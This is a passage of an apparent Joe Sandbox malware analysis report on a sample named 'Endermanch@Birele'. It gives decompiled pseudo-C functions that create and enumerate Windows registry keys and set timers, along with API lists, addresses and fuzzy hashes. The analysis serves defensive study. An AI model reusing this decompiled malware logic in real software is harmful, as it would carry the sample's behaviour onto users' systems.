                                                                                                                                                  				_push(E004153DC);
                                                                                                                                                  				return E004039AC( &_v16);
                                                                                                                                                  			}















                                                                                                                                                  0x004152da
                                                                                                                                                  0x004152dd
                                                                                                                                                  0x004152e2
                                                                                                                                                  0x004152e6
                                                                                                                                                  0x004152e7
                                                                                                                                                  0x004152ec
                                                                                                                                                  0x004152ef
                                                                                                                                                  0x004152f7
                                                                                                                                                  0x00415304
                                                                                                                                                  0x00415308
                                                                                                                                                  0x00415317
                                                                                                                                                  0x00415317
                                                                                                                                                  0x0041531e
                                                                                                                                                  0x00415325
                                                                                                                                                  0x0041533a
                                                                                                                                                  0x0041534a
                                                                                                                                                  0x00415351
                                                                                                                                                  0x00415357
                                                                                                                                                  0x0041536e
                                                                                                                                                  0x0041537e
                                                                                                                                                  0x00415385
                                                                                                                                                  0x00415385
                                                                                                                                                  0x0041538d
                                                                                                                                                  0x00415398
                                                                                                                                                  0x0041539a
                                                                                                                                                  0x0041539d
                                                                                                                                                  0x004153a2
                                                                                                                                                  0x004153ad
                                                                                                                                                  0x004153ad
                                                                                                                                                  0x004153ba
                                                                                                                                                  0x004153ba
                                                                                                                                                  0x004153c1
                                                                                                                                                  0x004153c4
                                                                                                                                                  0x004153c7
                                                                                                                                                  0x004153d4

                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004153D5), ref: 0041534A
                                                                                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,004153D5), ref: 0041537E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 436179556-0
                                                                                                                                                  • Opcode ID: 90c648b1bc57d283d89d203316200a22ed9f3b3a5543ba33884ccc30502b56b3
                                                                                                                                                  • Instruction ID: 0fc639a14f7caba3a9c303f525382ba161dd617fc893ef9164d67049e1a84380
                                                                                                                                                  • Opcode Fuzzy Hash: 90c648b1bc57d283d89d203316200a22ed9f3b3a5543ba33884ccc30502b56b3
                                                                                                                                                  • Instruction Fuzzy Hash: A3318131E00648BFDB11EAA5C841BDFBBBCAF44704F54857AB810E3281D7B99A458B48
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                  			E00415D0C(intOrPtr __eax, void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t28;
                                                                                                                                                  				void* _t43;
                                                                                                                                                  				intOrPtr _t58;
                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				intOrPtr _t71;
                                                                                                                                                  
                                                                                                                                                  				_t63 = __edi;
                                                                                                                                                  				_t68 = _t70;
                                                                                                                                                  				_t71 = _t70 + 0xfffffff4;
                                                                                                                                                  				_t65 = __ecx;
                                                                                                                                                  				_t43 = __edx;
                                                                                                                                                  				_v8 = __eax;
                                                                                                                                                  				_t21 = E0041580C(_v8, __edx, __edx, __eflags); // executed
                                                                                                                                                  				_t74 = _t21;
                                                                                                                                                  				if(_t21 == 0) {
                                                                                                                                                  					L10:
                                                                                                                                                  					return _t21;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t21 = E0041580C(_v8, __edx, _t65, _t74); // executed
                                                                                                                                                  					if(_t21 != 0) {
                                                                                                                                                  						goto L10;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t21 = E00415774(_v8, __edx, __edx, _t65); // executed
                                                                                                                                                  						_v12 = _t21;
                                                                                                                                                  						if(_v12 == 0) {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						} else {
                                                                                                                                                  							_push(_t68);
                                                                                                                                                  							_push(0x415dee);
                                                                                                                                                  							_push( *[fs:eax]);
                                                                                                                                                  							 *[fs:eax] = _t71;
                                                                                                                                                  							E004151F4(_v8, __edx, _t65, __edi, _t65); // executed
                                                                                                                                                  							_t28 = E00415774(_v8, __edx, _t65, _t65); // executed
                                                                                                                                                  							_v16 = _t28;
                                                                                                                                                  							_t77 = _v16;
                                                                                                                                                  							if(_v16 == 0) {
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								_pop(_t58);
                                                                                                                                                  								 *[fs:eax] = _t58;
                                                                                                                                                  								_push(0x415df5);
                                                                                                                                                  								return RegCloseKey(_v12);
                                                                                                                                                  							} else {
                                                                                                                                                  								_push(_t68);
                                                                                                                                                  								_push(0x415dd0);
                                                                                                                                                  								_push( *[fs:eax]);
                                                                                                                                                  								 *[fs:eax] = _t71;
                                                                                                                                                  								E00415998(_v12, __edx, _v16, __edi, _t65, _t77, _t68); // executed
                                                                                                                                                  								E00415AC0(_v12, _t43, _v16, _t63, _t65, _t77, _t68); // executed
                                                                                                                                                  								if(_a4 != 0) {
                                                                                                                                                  									E004153F4(_v8, _t43, _t43, _t65); // executed
                                                                                                                                                  								}
                                                                                                                                                  								_pop(_t61);
                                                                                                                                                  								 *[fs:eax] = _t61;
                                                                                                                                                  								_push(0x415dd7);
                                                                                                                                                  								return RegCloseKey(_v16);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}


















                                                                                                                                                  0x00415d0c
                                                                                                                                                  0x00415d0d
                                                                                                                                                  0x00415d0f
                                                                                                                                                  0x00415d14
                                                                                                                                                  0x00415d16
                                                                                                                                                  0x00415d18
                                                                                                                                                  0x00415d20
                                                                                                                                                  0x00415d25
                                                                                                                                                  0x00415d27
                                                                                                                                                  0x00415df5
                                                                                                                                                  0x00415dfa
                                                                                                                                                  0x00415d2d
                                                                                                                                                  0x00415d32
                                                                                                                                                  0x00415d39
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415d3f
                                                                                                                                                  0x00415d44
                                                                                                                                                  0x00415d49
                                                                                                                                                  0x00415d50
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415d56
                                                                                                                                                  0x00415d58
                                                                                                                                                  0x00415d59
                                                                                                                                                  0x00415d5e
                                                                                                                                                  0x00415d61
                                                                                                                                                  0x00415d69
                                                                                                                                                  0x00415d73
                                                                                                                                                  0x00415d78
                                                                                                                                                  0x00415d7b
                                                                                                                                                  0x00415d7f
                                                                                                                                                  0x00415dd7
                                                                                                                                                  0x00415dd9
                                                                                                                                                  0x00415ddc
                                                                                                                                                  0x00415ddf
                                                                                                                                                  0x00415ded
                                                                                                                                                  0x00415d81
                                                                                                                                                  0x00415d83
                                                                                                                                                  0x00415d84
                                                                                                                                                  0x00415d89
                                                                                                                                                  0x00415d8c
                                                                                                                                                  0x00415d96
                                                                                                                                                  0x00415da3
                                                                                                                                                  0x00415dad
                                                                                                                                                  0x00415db4
                                                                                                                                                  0x00415db4
                                                                                                                                                  0x00415dbb
                                                                                                                                                  0x00415dbe
                                                                                                                                                  0x00415dc1
                                                                                                                                                  0x00415dcf
                                                                                                                                                  0x00415dcf
                                                                                                                                                  0x00415d7f
                                                                                                                                                  0x00415d50
                                                                                                                                                  0x00415d39

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0041580C: RegCloseKey.ADVAPI32(00000000,00000000,00415868), ref: 00415846
                                                                                                                                                    • Part of subcall function 00415774: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                                                                    • Part of subcall function 004151F4: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041526B
                                                                                                                                                    • Part of subcall function 004151F4: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041527F
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00415DF5), ref: 00415DE8
                                                                                                                                                    • Part of subcall function 00415998: RegEnumValueA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415A8A,?,00000000,00415AAF), ref: 00415A3D
                                                                                                                                                    • Part of subcall function 00415AC0: RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415CD7,?,00000000,00415D01), ref: 00415B6F
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00415DD7,00000000,00415DEE), ref: 00415DCA
                                                                                                                                                    • Part of subcall function 004153F4: RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00415514,?,00000000,0041555D), ref: 004154C6
                                                                                                                                                    • Part of subcall function 004153F4: RegCloseKey.ADVAPI32(00000000,0041551B,00000000,0041555D), ref: 0041550E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$Enum$CreateOpenValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3109560722-0
                                                                                                                                                  • Opcode ID: f1600ae6bc6df724651c07be2e56834804ec54ba6a16370a75e1da82c29a70a3
                                                                                                                                                  • Instruction ID: 53f0292dbd8e348c2a6461f8a0b9a71041dcc7f1d42b1da0b48438f1688e31d7
                                                                                                                                                  • Opcode Fuzzy Hash: f1600ae6bc6df724651c07be2e56834804ec54ba6a16370a75e1da82c29a70a3
                                                                                                                                                  • Instruction Fuzzy Hash: E0217430A00A48EFDB01DF59D846ADEB7A9EB89714FA184B7E400D7251DA789D81CB58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E004151F4(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				char* _t26;
                                                                                                                                                  				signed int _t29;
                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                  				intOrPtr _t53;
                                                                                                                                                  				char _t56;
                                                                                                                                                  				void* _t58;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  				signed int _t64;
                                                                                                                                                  
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_t56 = __edx;
                                                                                                                                                  				_t58 = __eax;
                                                                                                                                                  				_push(_t61);
                                                                                                                                                  				_push(0x4152c0);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t61 + 0xffffffec;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				E00403A44( &_v12, __edx);
                                                                                                                                                  				_t42 = E00415080(_v12);
                                                                                                                                                  				if(_t22 == 0) {
                                                                                                                                                  					E00403ED8( &_v12, 1, 1);
                                                                                                                                                  				}
                                                                                                                                                  				_t26 = E00403E38(_v12);
                                                                                                                                                  				_t29 = RegCreateKeyExA(E004151DC(_t58, _t42), _t26, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v16); // executed
                                                                                                                                                  				_t64 = _t29;
                                                                                                                                                  				_t43 = _t29 & 0xffffff00 | _t64 == 0x00000000;
                                                                                                                                                  				if((_t29 & 0xffffff00 | _t64 == 0x00000000) == 0) {
                                                                                                                                                  					_v24 = _t56;
                                                                                                                                                  					_v20 = 0xb;
                                                                                                                                                  					_t45 =  *0x418530; // 0x4119c4
                                                                                                                                                  					E0040CDD0(_t43, _t45, 1, _t56, _t58, 0,  &_v24);
                                                                                                                                                  					E0040340C();
                                                                                                                                                  				} else {
                                                                                                                                                  					RegCloseKey(_v8); // executed
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t53);
                                                                                                                                                  				 *[fs:eax] = _t53;
                                                                                                                                                  				_push(E004152C7);
                                                                                                                                                  				return E004039AC( &_v12);
                                                                                                                                                  			}
















                                                                                                                                                  0x004151ff
                                                                                                                                                  0x00415202
                                                                                                                                                  0x00415204
                                                                                                                                                  0x00415208
                                                                                                                                                  0x00415209
                                                                                                                                                  0x0041520e
                                                                                                                                                  0x00415211
                                                                                                                                                  0x00415216
                                                                                                                                                  0x0041521e
                                                                                                                                                  0x0041522b
                                                                                                                                                  0x0041522f
                                                                                                                                                  0x0041523e
                                                                                                                                                  0x0041523e
                                                                                                                                                  0x0041525b
                                                                                                                                                  0x0041526b
                                                                                                                                                  0x00415270
                                                                                                                                                  0x00415275
                                                                                                                                                  0x00415279
                                                                                                                                                  0x00415286
                                                                                                                                                  0x00415289
                                                                                                                                                  0x00415293
                                                                                                                                                  0x004152a0
                                                                                                                                                  0x004152a5
                                                                                                                                                  0x0041527b
                                                                                                                                                  0x0041527f
                                                                                                                                                  0x0041527f
                                                                                                                                                  0x004152ac
                                                                                                                                                  0x004152af
                                                                                                                                                  0x004152b2
                                                                                                                                                  0x004152bf

                                                                                                                                                  APIs
                                                                                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041526B
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041527F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2932200918-0
                                                                                                                                                  • Opcode ID: 9c21d2041d08c01a8f705047545dd92b847b46b9f2254d498b3837aee35c0b92
                                                                                                                                                  • Instruction ID: 88a55942ac6acbeff302fb8522e327191725e073226085f62b7fc5a3a3ec0e0d
                                                                                                                                                  • Opcode Fuzzy Hash: 9c21d2041d08c01a8f705047545dd92b847b46b9f2254d498b3837aee35c0b92
                                                                                                                                                  • Instruction Fuzzy Hash: 53216F31B40608AFD711EBA5CC51BEF7BAC9B88704F50057AF904E72C2DA79AA418A59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                  			E00408088(int __eax, char __edx) {
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				intOrPtr _t16;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  				int _t23;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                  
                                                                                                                                                  				_t15 = _t24;
                                                                                                                                                  				_t25 = __eax;
                                                                                                                                                  				if( *((intOrPtr*)(__eax + 0x1c)) == __edx) {
                                                                                                                                                  					return _t15;
                                                                                                                                                  				} else {
                                                                                                                                                  					 *((char*)(__eax + 0x1c)) = __edx;
                                                                                                                                                  					_t36 = __edx;
                                                                                                                                                  					if(__edx == 0) {
                                                                                                                                                  						__eflags = 0;
                                                                                                                                                  						_t11 = __eax + 0x18;
                                                                                                                                                  						 *_t11 = 0;
                                                                                                                                                  						asm("jecxz 0x11");
                                                                                                                                                  						_t16 =  *0x419900; // 0x2173628
                                                                                                                                                  						_t13 = _t16 + 0x1c; // 0x103f8
                                                                                                                                                  						return KillTimer( *_t13,  *_t11);
                                                                                                                                                  					}
                                                                                                                                                  					_t28 =  *0x419900; // 0x2173628
                                                                                                                                                  					asm("loop 0x22");
                                                                                                                                                  					_t19 = E00406EBC(0, _t28 + 2, 0x41811c, _t36, 0);
                                                                                                                                                  					 *0x419900 = _t19;
                                                                                                                                                  					 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                                                                                                                  					 *(_t19 + 0x36) =  *(_t19 + 0x36) | 0x00000008;
                                                                                                                                                  					_t23 = SetTimer(E004083E0(_t19), _t25,  *(_t25 + 0x1d), E0040804C); // executed
                                                                                                                                                  					 *(_t25 + 0x18) = _t23;
                                                                                                                                                  					return _t23;
                                                                                                                                                  				}
                                                                                                                                                  			}









                                                                                                                                                  0x00408089
                                                                                                                                                  0x00408089
                                                                                                                                                  0x0040808d
                                                                                                                                                  0x004080f0
                                                                                                                                                  0x0040808f
                                                                                                                                                  0x0040808f
                                                                                                                                                  0x00408092
                                                                                                                                                  0x00408094
                                                                                                                                                  0x004080d9
                                                                                                                                                  0x004080db
                                                                                                                                                  0x004080db
                                                                                                                                                  0x004080de
                                                                                                                                                  0x004080e1
                                                                                                                                                  0x004080e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004080ea
                                                                                                                                                  0x00408096
                                                                                                                                                  0x0040809d
                                                                                                                                                  0x004080a8
                                                                                                                                                  0x004080ad
                                                                                                                                                  0x004080b3
                                                                                                                                                  0x004080ba
                                                                                                                                                  0x004080cf
                                                                                                                                                  0x004080d4
                                                                                                                                                  0x004080d8
                                                                                                                                                  0x004080d8

                                                                                                                                                  APIs
                                                                                                                                                  • SetTimer.USER32(00000000,?,?,Function_0000804C), ref: 004080CF
                                                                                                                                                  • KillTimer.USER32(000103F8,00000000,?,0040806C), ref: 004080EA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Timer$Kill
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3307318486-0
                                                                                                                                                  • Opcode ID: 4d5916390310af83fd2e008a8594d6072cea37795669da6ee82292d551570266
                                                                                                                                                  • Instruction ID: ea5ea7dca1dedb31b910899b8a9cd09f73beb78ae046967fbe0a237be4c5d105
                                                                                                                                                  • Opcode Fuzzy Hash: 4d5916390310af83fd2e008a8594d6072cea37795669da6ee82292d551570266
                                                                                                                                                  • Instruction Fuzzy Hash: 97F062F0109201AEDB1ADF71D9D29173A58AB00304B1580BEA4819F2D7CF7ED829DB9C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                  			E00406A8E(void* __eax) {
                                                                                                                                                  				void* _t4;
                                                                                                                                                  				int _t5;
                                                                                                                                                  
                                                                                                                                                  				_t4 = __eax;
                                                                                                                                                  				if( *((char*)(__eax + 0x18)) != 1) {
                                                                                                                                                  					asm("jecxz 0xa");
                                                                                                                                                  					DeleteObject( *(__eax + 0x31));
                                                                                                                                                  					_pop(_t4);
                                                                                                                                                  					_push(_t4);
                                                                                                                                                  				}
                                                                                                                                                  				asm("jecxz 0x8");
                                                                                                                                                  				_t5 = DeleteObject( *(_t4 + 0x19)); // executed
                                                                                                                                                  				return E00406818(_t5);
                                                                                                                                                  			}





                                                                                                                                                  0x00406a8e
                                                                                                                                                  0x00406a95
                                                                                                                                                  0x00406a9a
                                                                                                                                                  0x00406a9d
                                                                                                                                                  0x00406aa2
                                                                                                                                                  0x00406aa3
                                                                                                                                                  0x00406aa3
                                                                                                                                                  0x00406aa7
                                                                                                                                                  0x00406aaa
                                                                                                                                                  0x00406ab5

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteObject
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1531683806-0
                                                                                                                                                  • Opcode ID: 11050a5f5332eabe293480d04a417c93c8e6a60e9b6efb213c1eb86e43156022
                                                                                                                                                  • Instruction ID: f40f0d2549bdb67fbd6df8d461d043d7abc0c8bf2df47537e8dada0267b4ecf6
                                                                                                                                                  • Opcode Fuzzy Hash: 11050a5f5332eabe293480d04a417c93c8e6a60e9b6efb213c1eb86e43156022
                                                                                                                                                  • Instruction Fuzzy Hash: 9DD05EB13501002EDB48FB318425D27264CCB4531879288BF7403FB1E2CA7CECA0CE28
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                  			E00415998(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                  				char _v48;
                                                                                                                                                  				char _v52;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  				long _t56;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				void* _t67;
                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                  				int _t87;
                                                                                                                                                  				void* _t89;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  				void* _t92;
                                                                                                                                                  				intOrPtr _t93;
                                                                                                                                                  
                                                                                                                                                  				_t91 = _t92;
                                                                                                                                                  				_t93 = _t92 + 0xffffffd0;
                                                                                                                                                  				_push(__ebx);
                                                                                                                                                  				_v52 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v8 = __edx;
                                                                                                                                                  				_t89 = __eax;
                                                                                                                                                  				_push(_t91);
                                                                                                                                                  				_push(0x415aaf);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t93;
                                                                                                                                                  				_v20 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                                                                  				E004151F0( *((intOrPtr*)(_a4 - 4)), __eax);
                                                                                                                                                  				_push(_t91);
                                                                                                                                                  				_push(0x415a8a);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t93;
                                                                                                                                                  				_t41 = E0041558C( *((intOrPtr*)(_a4 - 4)),  &_v48, __eflags);
                                                                                                                                                  				_t95 = _t41;
                                                                                                                                                  				if(_t41 != 0) {
                                                                                                                                                  					E00415878(_t89, __ebx, 0, _v8, _t89, _t95, _a4); // executed
                                                                                                                                                  					E00403A9C( &_v16, _v36 + 1, 0);
                                                                                                                                                  					_t66 = _v40 - 1;
                                                                                                                                                  					if(_t66 >= 0) {
                                                                                                                                                  						_t67 = _t66 + 1;
                                                                                                                                                  						_t87 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_v12 = _v36 + 1;
                                                                                                                                                  							_t56 = RegEnumValueA(_t89, _t87, E00403E38(_v16),  &_v12, 0, 0, 0, 0); // executed
                                                                                                                                                  							_t98 = _t56;
                                                                                                                                                  							if(_t56 == 0) {
                                                                                                                                                  								E00403BA4( &_v52, E00403E38(_v16));
                                                                                                                                                  								E00415878(_t89, _t67, _v52, _v8, _t89, _t98, _a4); // executed
                                                                                                                                                  							}
                                                                                                                                                  							_t87 = _t87 + 1;
                                                                                                                                                  							_t67 = _t67 - 1;
                                                                                                                                                  						} while (_t67 != 0);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t80);
                                                                                                                                                  				 *[fs:eax] = _t80;
                                                                                                                                                  				_push(E00415A91);
                                                                                                                                                  				return E004151F0( *((intOrPtr*)(_a4 - 4)), _v20);
                                                                                                                                                  			}





















                                                                                                                                                  0x00415999
                                                                                                                                                  0x0041599b
                                                                                                                                                  0x0041599e
                                                                                                                                                  0x004159a3
                                                                                                                                                  0x004159a6
                                                                                                                                                  0x004159a9
                                                                                                                                                  0x004159ac
                                                                                                                                                  0x004159b0
                                                                                                                                                  0x004159b1
                                                                                                                                                  0x004159b6
                                                                                                                                                  0x004159b9
                                                                                                                                                  0x004159c5
                                                                                                                                                  0x004159d0
                                                                                                                                                  0x004159d7
                                                                                                                                                  0x004159d8
                                                                                                                                                  0x004159dd
                                                                                                                                                  0x004159e0
                                                                                                                                                  0x004159ec
                                                                                                                                                  0x004159f1
                                                                                                                                                  0x004159f3
                                                                                                                                                  0x00415a00
                                                                                                                                                  0x00415a0f
                                                                                                                                                  0x00415a17
                                                                                                                                                  0x00415a1a
                                                                                                                                                  0x00415a1c
                                                                                                                                                  0x00415a1d
                                                                                                                                                  0x00415a1f
                                                                                                                                                  0x00415a23
                                                                                                                                                  0x00415a3d
                                                                                                                                                  0x00415a42
                                                                                                                                                  0x00415a44
                                                                                                                                                  0x00415a57
                                                                                                                                                  0x00415a64
                                                                                                                                                  0x00415a69
                                                                                                                                                  0x00415a6a
                                                                                                                                                  0x00415a6b
                                                                                                                                                  0x00415a6b
                                                                                                                                                  0x00415a1f
                                                                                                                                                  0x00415a1a
                                                                                                                                                  0x00415a70
                                                                                                                                                  0x00415a73
                                                                                                                                                  0x00415a76
                                                                                                                                                  0x00415a89

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0041558C: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?,?,0041548A,00000000), ref: 004155C3
                                                                                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415A8A,?,00000000,00415AAF), ref: 00415A3D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnumInfoQueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 918324718-0
                                                                                                                                                  • Opcode ID: 63e267d475dcd352d8fbff878842719c3677ac2519d315a21a806ea70cde275c
                                                                                                                                                  • Instruction ID: 171b7b22683ce0dd6a9f90d9f0d3745b5014ced1ac0cdb1bd2b591f6e2352622
                                                                                                                                                  • Opcode Fuzzy Hash: 63e267d475dcd352d8fbff878842719c3677ac2519d315a21a806ea70cde275c
                                                                                                                                                  • Instruction Fuzzy Hash: 13314C35A40A08EFCB15DF59D881ADEBBF9EF88744F10816AF805E7350D738AE418A58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                  			E00415774(void* __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				char* _t20;
                                                                                                                                                  				intOrPtr _t39;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  				void* _t45;
                                                                                                                                                  
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_t42 = __eax;
                                                                                                                                                  				_push(_t45);
                                                                                                                                                  				_push(0x4157fa);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t45 + 0xfffffff8;
                                                                                                                                                  				E00403A44( &_v12, __edx);
                                                                                                                                                  				_t31 = E00415080(_v12);
                                                                                                                                                  				if(_t15 == 0) {
